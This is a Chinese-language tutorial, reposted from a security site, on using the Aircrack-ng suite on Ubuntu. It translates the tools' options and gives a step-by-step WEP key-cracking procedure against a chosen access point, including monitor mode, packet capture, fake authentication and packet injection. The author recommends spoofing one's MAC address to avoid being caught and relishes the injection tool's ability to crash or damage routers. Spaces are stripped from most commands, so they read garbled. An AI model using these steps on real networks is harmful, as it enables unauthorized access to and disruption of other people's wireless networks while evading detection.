原創鏈接:http://netsecurity.51cto.com/art/201111/304171.htm
Ubuntu下Aircrack-ng工具包的使用
由於在Windows環境下不能如Linux環境下直接調用無線網卡,所以需要使用其他工具將無線網卡載入,以便攻擊工具能夠正常使用,在無線攻擊套裝Aircrack-ng的Windows版本下內置這樣的工具,就是Aircrack-ng,下面給大家介紹一下在Ubuntu下Aircrack-ng工具包的使用。
安裝:$sudoapt-getinstallaircrack-ng
Aircrack-ng無線破解工具包有很多工具,用到的工具主要有以下幾個:
airmon-ng處理網卡工作模式
airodump-ng抓包
aircrack-ng破解
aireplay-ng發包,干擾
1)airmon-ng
啟動無線網卡進入Monitor模式,
useage:airmon-ng<start|stop|check><interface>[channel]
<start|stop|check>:啟動,停止,檢測
<interface>:指定無線網卡
[channel]:監聽頻道,現代大多數無線路由默認是6,隨便掃描一下都是這個頻道,網管們應該換換了
2)airodump-ng
抓包工具,我最喜歡用的,詳細用法如下:
usage:airodump-ng<options><interface>[,<interface>,...]
Options:
–ivs:僅將抓取信息保存為.ivs
–write<prefix>:保存為指定日文件名,我一般用這個,尤其是多個網絡時,指定了也好區分
–beacons:保存所有的beacons,默認情況況下是丟棄那些無用的數據包的
Filteroptions:
–encrypt<suite>:使用密碼序列過濾AP
–netmask<netmask>:使用掩碼過濾AP
–bssid<bssid>:使用bssid過濾AP
-a:過濾無關的客戶端
–help:顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文
3)aireplay-ng
搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質的AP設備(小內存的路由器可能會重啟,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸.
usage:aireplay-ng<options><replayinterface>
Filteroptions:
-bbssid:AP的MAC
-ddmac:目標的MAC
-ssmac:來源的MAC
-mlen:最小包長度
-nlen:最大包長度
-D:禁用AP發現功能
Replayoptions:
-xnbpps:每秒包數量
-pfctrl:框架設定(hex)
-abssid:設置AP的mac
-cdmac:設置目標的MAC
-hsmac:設置來源的mac
-gvalue:改變環緩存大小(默認8)
Fakeauthattackoptions:
-eessid:設置目標AP的SSID
-onpckts:每秒爆破的包數量(0自動,默認1)
-qsec:存活時間秒
-yprga:共享可信的key流
–help:顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全准確的翻譯,主要對付那些不給出作者就引用的人,鄙視抄襲.
4)aircrack-ng
破解KEY,漫長的過程.漫不漫長取決於兩個方面:一是網管的聰明程度(能否設置出復雜的密碼),二是電腦的速度.
usage:aircrack-ng[options]<.cap/.ivsfile(s)>
Commonoptions:
-a<amode>:暴破(1/WEP,2/WPA-PSK)
-e<essid>:選擇essid為目標
-b<bssid>:選擇ap的mac為目標,就是破解識別的關鍵字
-q:使用安靜模式,無數出模式
-C<macs>:將所有的AP合並為一個虛擬的
–help:顯示這個幫助
就WEP破解說明,步驟:
步驟:
1.修改無線網卡狀態:先down掉
2.偽造無線網卡的MAC地址:安全起見,減少被抓到的可能
3.修改網卡工作模式:進入Monitor狀態,會產生一個虛擬的網卡
4.修改無線網卡狀態:up
5.查看網絡狀態,記錄下AP的MAC和本機的MAC,確定攻擊目標
6.監聽抓包:生成.cap或.ivs
7.干擾無線網絡:截取無線數據包,發送垃圾數據包,用來獲得更多的有效數據包
8.破解.cap或.ivs,獲得WEP密碼,完成破解
具體步驟:
1、首先確定是否有wlan0的無線網卡端口,ifconfig即可知道。若存在終端輸入sudoairmon-ngstartwlan0啟動無線網卡的監控模式。
2、在終端中輸入sudoairodump-ngmon0,啟動監控模式后無線端口是mon0(如果啟動多次會按數字累加),看看有哪些采用wep加密的AP在線,然后按ctrl+c退出,保留終端。
3、另開一個終端,輸入sudoairodump-ng-c6--bssidAP'sMAC-wwepmon0(-c后面的6為AP工作頻道,--bissid后面的AP'sMAC是要欲破解AP的MAC地址,-w后的wep的是抓下來的數據包DATA保存的文件名(可以隨便取名),然后回車開始抓包。
4、再另開一個終端,輸入sudoaireplay-ng-10-eESSID-aAP'sMAC-hMyMACmon0與AP建立虛擬連接(-h后面跟着的MyMAC是自己的無線網卡的MAC地址)
這里以之前探測到的ESSID為P2P的為例。
5、建立虛擬連接成功后,輸入sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-bAP'sMAC-hMyMACmon0進行注入,現在步驟3中數據包應該不斷增長。
6、收集有5000個以上的DATA之后,另開一個終端,輸入sudoaircrack-ngwep*.cap進行解密(如果沒算出來的話,繼續等,Ubuntuaircrack-ng會在DATA每增加多5000個之后就自動再運行,直到算出密碼為至)
7、破解出密碼后在終端中輸入sudoairmon-ngstopmon0關閉監控模式,不然無線網卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關閉終端都是不行的,除非重新啟動電腦。
8、如果沒有出現意外,你應該會很高興的看到KEYFOUND!